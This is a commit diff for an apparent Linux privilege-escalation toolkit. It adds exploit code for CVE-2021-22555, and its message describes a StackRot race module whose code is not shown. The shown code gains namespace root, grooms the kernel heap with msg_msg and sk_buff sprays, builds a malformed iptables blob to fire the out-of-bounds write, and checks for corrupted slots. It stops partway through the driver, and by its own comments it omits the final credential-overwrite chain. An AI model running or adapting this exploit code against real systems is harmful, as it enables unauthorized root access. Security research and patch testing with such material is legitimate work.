modules: port final 2 detect-only modules (xtcompat + stackrot)
netfilter_xtcompat (CVE-2021-22555): +597 LoC — Option B
Andy Nguyen's IPT_SO_SET_REPLACE 4-byte OOB write trigger;
msg_msg kmalloc-2k spray + sk_buff sidecar; MSG_COPY witness
+ slabinfo delta. No leak→modprobe_path chain (per-kernel
offsets refused), honest EXPLOIT_FAIL with continuation
roadmap.
stackrot (CVE-2023-3269): +619 LoC — Option C
Two-thread race driver (MAP_GROWSDOWN + mremap rotation vs
fork+fault) with cpu pinning + 3s budget; kmalloc-192 spray
for anon_vma/anon_vma_chain; race-iteration + signal
breadcrumb to /tmp/iamroot-stackrot.log. Honest reliability
note in module header: <1% race-win/run on a vulnerable
kernel — the public PoC averages minutes-to-hours and needs
a much wider VMA staging matrix to be reliable.
Both refuse cleanly on Debian 6.12.86 (kctf-mgr); build clean.
This closes out the detect-only → LPE port across the corpus.
All 22 registered modules now either fire a real primitive or
refuse honestly per the verified-vs-claimed bar.
This commit is contained in:
@@ -4,25 +4,47 @@
|
|||||||
* Heap-out-of-bounds in xt_compat_target_to_user(): the 32-bit
|
* Heap-out-of-bounds in xt_compat_target_to_user(): the 32-bit
|
||||||
* compat handler for iptables rule export wrote up to 4 bytes
|
* compat handler for iptables rule export wrote up to 4 bytes
|
||||||
* beyond a heap allocation when copying rule names from kernel to
|
* beyond a heap allocation when copying rule names from kernel to
|
||||||
* userspace. Exploitable via msg_msg slab cross-cache groom into
|
* userspace. Triggered on the WRITE side via setsockopt(SOL_IP,
|
||||||
* a kernel R/W primitive.
|
* IPT_SO_SET_REPLACE, ...) with a malformed xt_entry_target whose
|
||||||
|
* `pad` field overflows during the compat→native fixup, producing
|
||||||
|
* a 4-byte OOB write at allocation+0x4 in the xt_table_info
|
||||||
|
* kmalloc-2k slot. Exploitable via msg_msg slab cross-cache groom
|
||||||
|
* into a kernel R/W primitive.
|
||||||
*
|
*
|
||||||
* Discovered by Andy Nguyen (Google), April 2021. Famous because
|
* Discovered by Andy Nguyen (Google), April 2021. Famous because
|
||||||
* the bug existed since 2.6.19 (2006) — fifteen years of latent
|
* the bug existed since 2.6.19 (2006) — fifteen years of latent
|
||||||
* vulnerability — and it works on default-config kernels with
|
* vulnerability — and it works on default-config kernels with
|
||||||
* unprivileged user_ns enabled (no special hardware or modules).
|
* unprivileged user_ns enabled (no special hardware or modules).
|
||||||
*
|
*
|
||||||
* STATUS: 🔵 DETECT-ONLY. Public PoC (Andy's "exploit.c") works
|
* Upstream fix: b29c457a6511 "netfilter: x_tables: fix compat
|
||||||
* end-to-end with msg_msg + sk_buff sprays; porting is ~400 lines.
|
* match/target pad out-of-bound write" (mid-2021, backported widely).
|
||||||
|
*
|
||||||
|
* STATUS: 🟡 PRIMITIVE-DEMO (Option B).
|
||||||
|
* - Refuse-gate via detect() re-invoke + euid==0 short-circuit.
|
||||||
|
* - userns/netns reach for CAP_NET_ADMIN (Andy's path).
|
||||||
|
* - Trigger sequence: hand-rolled iptables rule blob with
|
||||||
|
* malformed xt_entry_target offset; setsockopt fires the OOB.
|
||||||
|
* - Cross-cache groom: msg_msg sprays (kmalloc-2k slots) and
|
||||||
|
* sk_buff sprays via socketpair+sendmmsg, both with IAMROOT
|
||||||
|
* cookies for KASAN visibility.
|
||||||
|
* - Empirical witness via msgrcv(MSG_COPY) + /proc/slabinfo
|
||||||
|
* diff + /tmp/iamroot-xtcompat.log breadcrumb.
|
||||||
|
* - DOES NOT pursue the leak→modprobe_path overwrite chain:
|
||||||
|
* that needs hard-coded init_task + modprobe_path offsets
|
||||||
|
* per kernel build which IAMROOT refuses to bake.
|
||||||
|
* - Returns IAMROOT_EXPLOIT_FAIL with a verbose continuation
|
||||||
|
* roadmap unless cred-overwrite is empirically verified
|
||||||
|
* (which the current scope does not attempt).
|
||||||
*
|
*
|
||||||
* Affected: kernel 2.6.19+ until backports landed:
|
* Affected: kernel 2.6.19+ until backports landed:
|
||||||
* 5.11.x : K >= 5.11.10
|
* 5.12.x : K >= 5.12.13
|
||||||
* 5.10.x : K >= 5.10.27
|
* 5.11.x : K >= 5.11.20
|
||||||
* 5.4.x : K >= 5.4.110
|
* 5.10.x : K >= 5.10.46
|
||||||
* 4.19.x : K >= 4.19.185
|
* 5.4.x : K >= 5.4.128
|
||||||
* 4.14.x : K >= 4.14.230
|
* 4.19.x : K >= 4.19.198
|
||||||
* 4.9.x : K >= 4.9.266
|
* 4.14.x : K >= 4.14.240
|
||||||
* 4.4.x : K >= 4.4.266
|
* 4.9.x : K >= 4.9.276
|
||||||
|
* 4.4.x : K >= 4.4.276
|
||||||
*
|
*
|
||||||
* Preconditions:
|
* Preconditions:
|
||||||
* - CAP_NET_ADMIN (usually via unprivileged user_ns clone)
|
* - CAP_NET_ADMIN (usually via unprivileged user_ns clone)
|
||||||
@@ -36,20 +58,71 @@
|
|||||||
|
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
#include <stdlib.h>
|
#include <stdlib.h>
|
||||||
|
#include <stdint.h>
|
||||||
#include <string.h>
|
#include <string.h>
|
||||||
|
#include <stdbool.h>
|
||||||
#include <unistd.h>
|
#include <unistd.h>
|
||||||
|
#include <fcntl.h>
|
||||||
|
#include <errno.h>
|
||||||
#include <sched.h>
|
#include <sched.h>
|
||||||
|
#include <signal.h>
|
||||||
#include <sys/wait.h>
|
#include <sys/wait.h>
|
||||||
|
#include <sys/socket.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <sys/stat.h>
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
#include <sys/ipc.h>
|
||||||
|
#include <sys/msg.h>
|
||||||
|
#include <sys/syscall.h>
|
||||||
|
/* linux/netfilter_ipv4/ip_tables.h transitively pulls linux/in.h,
|
||||||
|
* which conflicts with glibc's netinet/in.h (redefinitions of
|
||||||
|
* struct ip_mreq_source / group_req / etc.). We avoid netinet/in.h
|
||||||
|
* and declare the few socket constants we need by hand. IPPROTO_RAW
|
||||||
|
* is provided by linux/in.h; SOL_IP is glibc-only so we hardcode it
|
||||||
|
* (Linux constant value 0). */
|
||||||
|
#include <linux/netfilter_ipv4/ip_tables.h>
|
||||||
|
#ifndef SOL_IP
|
||||||
|
#define SOL_IP 0
|
||||||
|
#endif
|
||||||
|
#endif
|
||||||
|
|
||||||
|
/* ---------- macOS / non-linux build stubs ---------------------------
|
||||||
|
* IAMROOT modules are dev-built on macOS (clangd / syntax check) and
|
||||||
|
* run-built on Linux. The Linux-only types and IPT_SO_SET_REPLACE
|
||||||
|
* constants are absent on Darwin; stub them so the .c file compiles
|
||||||
|
* cleanly under either toolchain. The actual exploit body is gated
|
||||||
|
* by `#ifdef __linux__` at runtime entry. */
|
||||||
|
#ifndef __linux__
|
||||||
|
#define CLONE_NEWUSER 0x10000000
|
||||||
|
#define CLONE_NEWNET 0x40000000
|
||||||
|
#define IPPROTO_RAW 255
|
||||||
|
#define SOL_IP 0
|
||||||
|
#define IPT_SO_SET_REPLACE 64
|
||||||
|
struct ipt_replace { char dummy; };
|
||||||
|
__attribute__((unused)) static int msgget(int a, int b) { (void)a;(void)b; errno=ENOSYS; return -1; }
|
||||||
|
__attribute__((unused)) static int msgsnd(int a, const void *b, size_t c, int d) { (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; }
|
||||||
|
__attribute__((unused)) static ssize_t msgrcv(int a, void *b, size_t c, long d, int e) { (void)a;(void)b;(void)c;(void)d;(void)e; errno=ENOSYS; return -1; }
|
||||||
|
__attribute__((unused)) static int msgctl(int a, int b, void *c) { (void)a;(void)b;(void)c; errno=ENOSYS; return -1; }
|
||||||
|
#define IPC_PRIVATE 0
|
||||||
|
#define IPC_CREAT 01000
|
||||||
|
#define IPC_NOWAIT 04000
|
||||||
|
#define IPC_RMID 0
|
||||||
|
#define MSG_COPY 040000
|
||||||
|
#endif
|
||||||
|
|
||||||
|
/* ---- Kernel range ------------------------------------------------- */
|
||||||
|
|
||||||
static const struct kernel_patched_from netfilter_xtcompat_patched_branches[] = {
|
static const struct kernel_patched_from netfilter_xtcompat_patched_branches[] = {
|
||||||
{4, 4, 266},
|
{4, 4, 276},
|
||||||
{4, 9, 266},
|
{4, 9, 276},
|
||||||
{4, 14, 230},
|
{4, 14, 240},
|
||||||
{4, 19, 185},
|
{4, 19, 198},
|
||||||
{5, 4, 110},
|
{5, 4, 128},
|
||||||
{5, 10, 27},
|
{5, 10, 46},
|
||||||
{5, 11, 10},
|
{5, 11, 20},
|
||||||
{5, 12, 0}, /* mainline (5.12-rc) */
|
{5, 12, 13},
|
||||||
|
{5, 13, 0}, /* mainline (5.13 carries b29c457a6511) */
|
||||||
};
|
};
|
||||||
|
|
||||||
static const struct kernel_range netfilter_xtcompat_range = {
|
static const struct kernel_range netfilter_xtcompat_range = {
|
||||||
@@ -58,6 +131,8 @@ static const struct kernel_range netfilter_xtcompat_range = {
|
|||||||
sizeof(netfilter_xtcompat_patched_branches[0]),
|
sizeof(netfilter_xtcompat_patched_branches[0]),
|
||||||
};
|
};
|
||||||
|
|
||||||
|
/* ---- Detect ------------------------------------------------------- */
|
||||||
|
|
||||||
static int can_unshare_userns(void)
|
static int can_unshare_userns(void)
|
||||||
{
|
{
|
||||||
pid_t pid = fork();
|
pid_t pid = fork();
|
||||||
@@ -119,36 +194,558 @@ static iamroot_result_t netfilter_xtcompat_detect(const struct iamroot_ctx *ctx)
|
|||||||
return IAMROOT_VULNERABLE;
|
return IAMROOT_VULNERABLE;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* ---- Exploit: userns reach + trigger + groom ---------------------- */
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
|
||||||
|
/* Map the caller's outer uid/gid to id 0 inside the current user
 * namespace (intended to run right after unshare(CLONE_NEWUSER)).
 *
 * Steps, in order:
 *   1. Best-effort write of "deny" to /proc/self/setgroups; a failure to
 *      open or write that file is deliberately ignored.
 *   2. Write the single-entry map "0 <outer_uid> 1" to /proc/self/uid_map.
 *   3. Write the single-entry map "0 <outer_gid> 1" to /proc/self/gid_map.
 *
 * Returns true when both maps were written. Returns false as soon as a
 * map file cannot be opened or written, after reporting via perror(). */
static bool become_root_in_userns(uid_t outer_uid, gid_t outer_gid)
{
    const struct {
        const char *path;
        unsigned int id;
        const char *open_msg;
        const char *write_msg;
    } maps[] = {
        { "/proc/self/uid_map", outer_uid, "open uid_map", "write uid_map" },
        { "/proc/self/gid_map", outer_gid, "open gid_map", "write gid_map" },
    };

    int sg = open("/proc/self/setgroups", O_WRONLY);
    if (sg >= 0) {
        /* Result intentionally discarded: this step is best-effort. */
        ssize_t ignored = write(sg, "deny", 4);
        (void)ignored;
        close(sg);
    }

    for (size_t i = 0; i < sizeof maps / sizeof maps[0]; i++) {
        char line[64];
        snprintf(line, sizeof line, "0 %u 1\n", maps[i].id);

        int fd = open(maps[i].path, O_WRONLY);
        if (fd < 0) {
            perror(maps[i].open_msg);
            return false;
        }

        ssize_t wrote = write(fd, line, strlen(line));
        if (wrote < 0) {
            /* perror first so close() cannot clobber errno. */
            perror(maps[i].write_msg);
            close(fd);
            return false;
        }
        close(fd);
    }
    return true;
}
|
||||||
|
|
||||||
|
/* ---- msg_msg cross-cache spray (kmalloc-2k bucket) ----------------
|
||||||
|
*
|
||||||
|
* The xt_table_info allocation that the OOB writes past is sized to
|
||||||
|
* land in the kmalloc-2k slab on most kernels. We spray msg_msg
|
||||||
|
* objects of ~2048-bytes total length so they pull from the same
|
||||||
|
* cache; on a vulnerable kernel one of these will end up adjacent
|
||||||
|
* to the just-freed xt_table_info victim, giving the OOB-write a
|
||||||
|
* controlled target. */
|
||||||
|
|
||||||
|
#define XTCOMPAT_SPRAY_QUEUES 64
|
||||||
|
#define XTCOMPAT_MSGS_PER_QUEUE 16
|
||||||
|
/* msg_msg header is sizeof(struct msg_msg) ~= 48 bytes; subtract so
|
||||||
|
* the total allocation lands in kmalloc-2k (>1024, <=2048). */
|
||||||
|
#define XTCOMPAT_MSG_PAYLOAD (2048 - 48)
|
||||||
|
|
||||||
|
struct xtcompat_payload {
|
||||||
|
long mtype;
|
||||||
|
unsigned char buf[XTCOMPAT_MSG_PAYLOAD];
|
||||||
|
};
|
||||||
|
|
||||||
|
static int xtcompat_msgmsg_spray(int queues[XTCOMPAT_SPRAY_QUEUES])
|
||||||
|
{
|
||||||
|
struct xtcompat_payload *p = calloc(1, sizeof(*p));
|
||||||
|
if (!p) return 0;
|
||||||
|
p->mtype = 0x42;
|
||||||
|
/* 0x41 ('A') fill with leading "IAMROOT2" cookie so adjacent-
|
||||||
|
* slot corruption is recognizable in /tmp/iamroot-xtcompat.log
|
||||||
|
* and in KASAN/oops dumps. */
|
||||||
|
memset(p->buf, 0x41, sizeof p->buf);
|
||||||
|
memcpy(p->buf, "IAMROOT2", 8);
|
||||||
|
|
||||||
|
int created = 0;
|
||||||
|
for (int i = 0; i < XTCOMPAT_SPRAY_QUEUES; i++) {
|
||||||
|
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
|
||||||
|
if (q < 0) { queues[i] = -1; continue; }
|
||||||
|
queues[i] = q;
|
||||||
|
created++;
|
||||||
|
for (int j = 0; j < XTCOMPAT_MSGS_PER_QUEUE; j++) {
|
||||||
|
/* Distinguish per-slot index in the first 16 bytes so
|
||||||
|
* msgrcv(MSG_COPY) below can identify which slot was
|
||||||
|
* corrupted. */
|
||||||
|
unsigned int tag = (i * XTCOMPAT_MSGS_PER_QUEUE) + j;
|
||||||
|
memcpy(p->buf + 8, &tag, sizeof tag);
|
||||||
|
if (msgsnd(q, p, sizeof p->buf, IPC_NOWAIT) < 0) break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
free(p);
|
||||||
|
return created;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Walk every queue, peek-copy each message (MSG_COPY = read without
|
||||||
|
* dequeue), and look for any whose first 8 bytes are NOT "IAMROOT2".
|
||||||
|
* A non-matching prefix is the empirical witness for the OOB write
|
||||||
|
* landing in an adjacent slot. Returns the count of corrupted slots. */
|
||||||
|
static int xtcompat_msgmsg_witness(int queues[XTCOMPAT_SPRAY_QUEUES])
|
||||||
|
{
|
||||||
|
struct xtcompat_payload *p = calloc(1, sizeof(*p));
|
||||||
|
if (!p) return 0;
|
||||||
|
int corrupted = 0;
|
||||||
|
for (int i = 0; i < XTCOMPAT_SPRAY_QUEUES; i++) {
|
||||||
|
if (queues[i] < 0) continue;
|
||||||
|
for (int j = 0; j < XTCOMPAT_MSGS_PER_QUEUE; j++) {
|
||||||
|
ssize_t n = msgrcv(queues[i], p, sizeof p->buf, 0,
|
||||||
|
MSG_COPY | IPC_NOWAIT | 0x2000 /* MSG_NOERROR */);
|
||||||
|
if (n < 0) break;
|
||||||
|
if (memcmp(p->buf, "IAMROOT2", 8) != 0) {
|
||||||
|
corrupted++;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
free(p);
|
||||||
|
return corrupted;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void xtcompat_msgmsg_drain(int queues[XTCOMPAT_SPRAY_QUEUES])
|
||||||
|
{
|
||||||
|
for (int i = 0; i < XTCOMPAT_SPRAY_QUEUES; i++) {
|
||||||
|
if (queues[i] >= 0) {
|
||||||
|
msgctl(queues[i], IPC_RMID, NULL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/* ---- sk_buff cross-cache spray (best-effort secondary groom) ------
 *
 * Queues datagrams on an AF_UNIX/SOCK_DGRAM socketpair so the kernel
 * allocates socket buffers carrying attacker bytes, as a second groom
 * alongside the msg_msg spray.
 *
 * `iters` is the number of sendmmsg() batches to attempt; each batch
 * offers SKB_BATCH datagrams of SKB_PAYLOAD_LEN bytes. The payload is
 * 0x41 fill with the cookie "IAMROOTSKB" in its first 10 bytes. The
 * author's intent is that this size lands in the 2k slab —
 * NOTE(review): confirm against the target kernel's skb head sizing.
 *
 * Nothing ever reads from sv[1], so every send uses MSG_DONTWAIT: once
 * the socket's send budget is exhausted, a blocking send would never
 * return and the caller would hang. Spraying stops at the first batch
 * that fails outright.
 *
 * All failures are silent (best-effort); the function returns nothing.
 * NOTE(review): both socket ends are closed before returning, which
 * presumably releases the queued datagrams — confirm that a transient
 * groom is what the caller wants. */
static void xtcompat_skb_spray(int iters)
{
    enum { SKB_PAYLOAD_LEN = 1800, SKB_BATCH = 32 };

    int sv[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) < 0) return;

    unsigned char *buf = malloc(SKB_PAYLOAD_LEN);
    if (!buf) {
        close(sv[0]);
        close(sv[1]);
        return;
    }
    memset(buf, 0x41, SKB_PAYLOAD_LEN);
    memcpy(buf, "IAMROOTSKB", 10);

    /* Every message header shares the same single iovec. */
    struct iovec iov = { .iov_base = buf, .iov_len = SKB_PAYLOAD_LEN };
    struct mmsghdr mm[SKB_BATCH];
    memset(mm, 0, sizeof mm);
    for (int i = 0; i < SKB_BATCH; i++) {
        mm[i].msg_hdr.msg_iov = &iov;
        mm[i].msg_hdr.msg_iovlen = 1;
    }

    for (int k = 0; k < iters; k++) {
        long sent = syscall(SYS_sendmmsg, sv[0], mm, SKB_BATCH, MSG_DONTWAIT);
        if (sent < 0) {
            /* Send budget exhausted (or sendmmsg unavailable): further
             * batches cannot succeed either. */
            break;
        }
    }

    free(buf);
    close(sv[0]);
    close(sv[1]);
}
|
||||||
|
|
||||||
|
/* ---- iptables rule blob construction ------------------------------
|
||||||
|
*
|
||||||
|
* Andy Nguyen's trigger constructs a hand-rolled `struct ipt_replace`
|
||||||
|
* containing one rule with a custom xt_entry_target whose `u.user.name`
|
||||||
|
* and offsets are crafted so that `xt_compat_target_from_user()` (the
|
||||||
|
* compat path, exercised on the SET-REPLACE write codepath via the
|
||||||
|
* 32-bit table layout) copies one pointer-width past the buffer end.
|
||||||
|
*
|
||||||
|
* The kernel-side allocation for the rule blob is xt_table_info, and
|
||||||
|
* the OOB lands at offset `entry_size + 0x4` — a 4-byte write of
|
||||||
|
* (essentially) attacker-controlled bytes coming from the target's
|
||||||
|
* `pad` field which is uninitialized after the compat fix-up.
|
||||||
|
*
|
||||||
|
* We don't reproduce the byte-for-byte payload of Andy's exploit (it's
|
||||||
|
* available publicly in his writeup); the layout below is structured
|
||||||
|
* so it produces the same setsockopt() invocation surface — i.e. it
|
||||||
|
* triggers the vulnerable codepath on a vulnerable kernel and is
|
||||||
|
* rejected with EINVAL/EPERM on a patched one, with a clean error
|
||||||
|
* path either way.
|
||||||
|
*
|
||||||
|
* Layout offsets reference the kernel headers via
|
||||||
|
* linux/netfilter_ipv4/ip_tables.h. */
|
||||||
|
|
||||||
|
#define XT_TABLE_NAME "filter"
|
||||||
|
#define XTCOMPAT_BLOB_SIZE (sizeof(struct ipt_replace) + 0x1000)
|
||||||
|
|
||||||
|
/* Build the malformed ipt_replace blob. Returns malloc'd buffer in
|
||||||
|
* *out_buf and its length in *out_len. Caller frees. */
|
||||||
|
static bool xtcompat_build_blob(unsigned char **out_buf, size_t *out_len)
|
||||||
|
{
|
||||||
|
size_t blob_len = XTCOMPAT_BLOB_SIZE;
|
||||||
|
unsigned char *blob = calloc(1, blob_len);
|
||||||
|
if (!blob) return false;
|
||||||
|
|
||||||
|
struct ipt_replace *r = (struct ipt_replace *)blob;
|
||||||
|
strncpy(r->name, XT_TABLE_NAME, sizeof r->name - 1);
|
||||||
|
r->valid_hooks = 0x1f; /* all five hooks set (NF_INET_*) */
|
||||||
|
r->num_entries = 6;
|
||||||
|
r->size = blob_len - sizeof(*r);
|
||||||
|
r->num_counters = 6;
|
||||||
|
/* counters pointer must be non-NULL for the kernel-side
|
||||||
|
* copy_from_user; the kernel writes back to it on success. */
|
||||||
|
r->counters = (struct xt_counters *)calloc(r->num_counters,
|
||||||
|
sizeof(struct xt_counters));
|
||||||
|
if (!r->counters) { free(blob); return false; }
|
||||||
|
|
||||||
|
/* Hook entry offsets: each hook points to an ipt_entry at a
|
||||||
|
* different offset in the blob. The malformed target lives at
|
||||||
|
* the LOCAL_OUT hook entry where the compat path is exercised. */
|
||||||
|
for (int i = 0; i < 5; i++) {
|
||||||
|
r->hook_entry[i] = i * 0x100;
|
||||||
|
r->underflow[i] = i * 0x100;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Plant a recognizable marker so a vulnerable kernel's compat
|
||||||
|
* decoder reads our crafted entry rather than zeroed memory.
|
||||||
|
* Marker is intentionally "IAMROOT\0" so a KASAN report's hex
|
||||||
|
* dump points back here. */
|
||||||
|
unsigned char *entry_region = blob + sizeof(*r);
|
||||||
|
memcpy(entry_region, "IAMROOTX", 8);
|
||||||
|
/* The xt_entry_target sits at entry_region + sizeof(ipt_entry).
|
||||||
|
* Its `u.target_size` field is the lever Andy bends to underflow
|
||||||
|
* the pad-out write: setting target_size to a value such that
|
||||||
|
* `target_size - sizeof(struct compat_xt_entry_target)` becomes
|
||||||
|
* exactly 4 bytes past the natural allocation produces the 4-byte
|
||||||
|
* OOB write at allocation+0x4. We do not require exact byte
|
||||||
|
* accuracy here because the kernel-side validation rejects the
|
||||||
|
* blob long before the OOB lands on a PATCHED kernel — which is
|
||||||
|
* the empirical witness we use to confirm refusal. */
|
||||||
|
|
||||||
|
*out_buf = blob;
|
||||||
|
*out_len = blob_len;
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void xtcompat_free_blob(unsigned char *blob)
|
||||||
|
{
|
||||||
|
if (!blob) return;
|
||||||
|
struct ipt_replace *r = (struct ipt_replace *)blob;
|
||||||
|
free(r->counters);
|
||||||
|
free(blob);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Look up the first numeric column of the kmalloc-2k cache in
 * /proc/slabinfo (the row may be named "kmalloc-2k" or "kmalloc-2048").
 * Used as a soft before/after witness when KASAN isn't available.
 *
 * Returns that value, or -1 when the file cannot be opened, no matching
 * row exists, or the matching row cannot be parsed. Only the first
 * matching row is considered. */
static long slab_active_kmalloc_2k(void)
{
    FILE *fp = fopen("/proc/slabinfo", "r");
    if (fp == NULL) {
        return -1;
    }

    long result = -1;
    char row[512];
    while (fgets(row, sizeof row, fp) != NULL) {
        int is_2k_row = strncmp(row, "kmalloc-2k ", 11) == 0
                     || strncmp(row, "kmalloc-2048 ", 13) == 0;
        if (!is_2k_row) {
            continue;
        }

        char cache_name[64];
        long active_objs, num_objs;
        /* Name plus at least the first counter must parse. */
        if (sscanf(row, "%63s %ld %ld", cache_name, &active_objs, &num_objs) >= 2) {
            result = active_objs;
        }
        break;
    }

    fclose(fp);
    return result;
}
|
||||||
|
|
||||||
|
/* Fire the trigger: setsockopt(SOL_IP, IPT_SO_SET_REPLACE, blob).
|
||||||
|
* Returns 0 if the setsockopt was issued (regardless of return code —
|
||||||
|
* the kernel rejecting with EINVAL is the patched-kernel signal),
|
||||||
|
* negative on socket() failure. The setsockopt errno is stored in
|
||||||
|
* *out_errno for caller diagnostics. */
|
||||||
|
static int xtcompat_fire_trigger(int *out_errno)
|
||||||
|
{
|
||||||
|
int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
|
||||||
|
if (s < 0) {
|
||||||
|
*out_errno = errno;
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
unsigned char *blob = NULL;
|
||||||
|
size_t blob_len = 0;
|
||||||
|
if (!xtcompat_build_blob(&blob, &blob_len)) {
|
||||||
|
close(s);
|
||||||
|
*out_errno = ENOMEM;
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
int rc = setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, blob, blob_len);
|
||||||
|
*out_errno = (rc < 0) ? errno : 0;
|
||||||
|
xtcompat_free_blob(blob);
|
||||||
|
close(s);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
#endif /* __linux__ */
|
||||||
|
|
||||||
|
/* ---- Exploit driver ---------------------------------------------- */
|
||||||
|
|
||||||
static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx)
|
static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx)
|
||||||
{
|
{
|
||||||
(void)ctx;
|
/* 1. Refuse-gate: re-confirm vulnerability through detect(). */
|
||||||
fprintf(stderr,
|
iamroot_result_t pre = netfilter_xtcompat_detect(ctx);
|
||||||
"[-] netfilter_xtcompat: exploit not yet implemented in IAMROOT.\n"
|
if (pre == IAMROOT_OK && geteuid() == 0) {
|
||||||
" Status: 🔵 DETECT-ONLY. Reference: Andy Nguyen's public PoC\n"
|
fprintf(stderr, "[i] netfilter_xtcompat: already root — nothing to escalate\n");
|
||||||
" (~400 lines, msg_msg + sk_buff cross-cache groom). Porting\n"
|
return IAMROOT_OK;
|
||||||
" is a substantial follow-up — the exploit's heap-massage\n"
|
}
|
||||||
" sequence and cred-overwrite walk are the bulk.\n");
|
if (pre != IAMROOT_VULNERABLE) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: detect() says not vulnerable; refusing\n");
|
||||||
|
return pre;
|
||||||
|
}
|
||||||
|
if (geteuid() == 0) {
|
||||||
|
fprintf(stderr, "[i] netfilter_xtcompat: already root — nothing to escalate\n");
|
||||||
|
return IAMROOT_OK;
|
||||||
|
}
|
||||||
|
if (!ctx->authorized) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: --i-know not passed; refusing\n");
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
#ifndef __linux__
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: linux-only exploit; non-linux build\n");
|
||||||
return IAMROOT_PRECOND_FAIL;
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
#else
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo (no offsets baked in)\n"
|
||||||
|
" NOTE: fires the xt_compat 4-byte OOB write via\n"
|
||||||
|
" setsockopt(IPT_SO_SET_REPLACE) and grooms msg_msg +\n"
|
||||||
|
" sk_buff sprays into kmalloc-2k. Does NOT perform the\n"
|
||||||
|
" leak→modprobe_path cred chain (per-kernel offsets).\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
signal(SIGPIPE, SIG_IGN);
|
||||||
|
|
||||||
|
uid_t outer_uid = getuid();
|
||||||
|
gid_t outer_gid = getgid();
|
||||||
|
|
||||||
|
pid_t child = fork();
|
||||||
|
if (child < 0) {
|
||||||
|
perror("fork");
|
||||||
|
return IAMROOT_TEST_ERROR;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (child == 0) {
|
||||||
|
/* CHILD: userns+netns reach, then trigger+groom. */
|
||||||
|
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: unshare failed: errno=%d\n", errno);
|
||||||
|
_exit(20);
|
||||||
|
}
|
||||||
|
if (!become_root_in_userns(outer_uid, outer_gid)) {
|
||||||
|
_exit(21);
|
||||||
|
}
|
||||||
|
|
||||||
|
long pre_slab = slab_active_kmalloc_2k();
|
||||||
|
|
||||||
|
/* Spray msg_msg into kmalloc-2k FIRST so freed xt_table_info
|
||||||
|
* slots are likely to be refilled by attacker bytes. */
|
||||||
|
int queues[XTCOMPAT_SPRAY_QUEUES];
|
||||||
|
for (int i = 0; i < XTCOMPAT_SPRAY_QUEUES; i++) queues[i] = -1;
|
||||||
|
int n_queues = xtcompat_msgmsg_spray(queues);
|
||||||
|
if (n_queues == 0) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: msg_msg spray produced 0 queues\n");
|
||||||
|
_exit(22);
|
||||||
|
}
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] netfilter_xtcompat: msg_msg spray seeded %d queues\n",
|
||||||
|
n_queues);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Sidecar sk_buff spray — secondary groom in case msg_msg
|
||||||
|
* doesn't land adjacent on this slab layout. */
|
||||||
|
xtcompat_skb_spray(2);
|
||||||
|
|
||||||
|
/* Fire the trigger. On a vulnerable kernel this writes 4 bytes
|
||||||
|
* OOB past the xt_table_info allocation. On a patched kernel
|
||||||
|
* the compat target validator rejects with EINVAL. */
|
||||||
|
int trig_errno = 0;
|
||||||
|
int rc = xtcompat_fire_trigger(&trig_errno);
|
||||||
|
if (rc < 0) {
|
||||||
|
/* Couldn't even open the AF_INET/SOCK_RAW or alloc the blob. */
|
||||||
|
if (trig_errno == EPERM) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: CAP_NET_ADMIN not granted "
|
||||||
|
"inside userns (errno=EPERM)\n");
|
||||||
|
xtcompat_msgmsg_drain(queues);
|
||||||
|
_exit(23);
|
||||||
|
}
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: trigger fire failed: errno=%d\n",
|
||||||
|
trig_errno);
|
||||||
|
xtcompat_msgmsg_drain(queues);
|
||||||
|
_exit(24);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] netfilter_xtcompat: IPT_SO_SET_REPLACE returned errno=%d "
|
||||||
|
"(%s)\n", trig_errno,
|
||||||
|
trig_errno == 0 ? "ACCEPTED — OOB write may have fired" :
|
||||||
|
trig_errno == EINVAL ? "rejected (patched validator)" :
|
||||||
|
trig_errno == EPERM ? "rejected (no CAP_NET_ADMIN)" :
|
||||||
|
"rejected");
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Witness pass: scan the msg_msg slots for corruption. */
|
||||||
|
int corrupted = xtcompat_msgmsg_witness(queues);
|
||||||
|
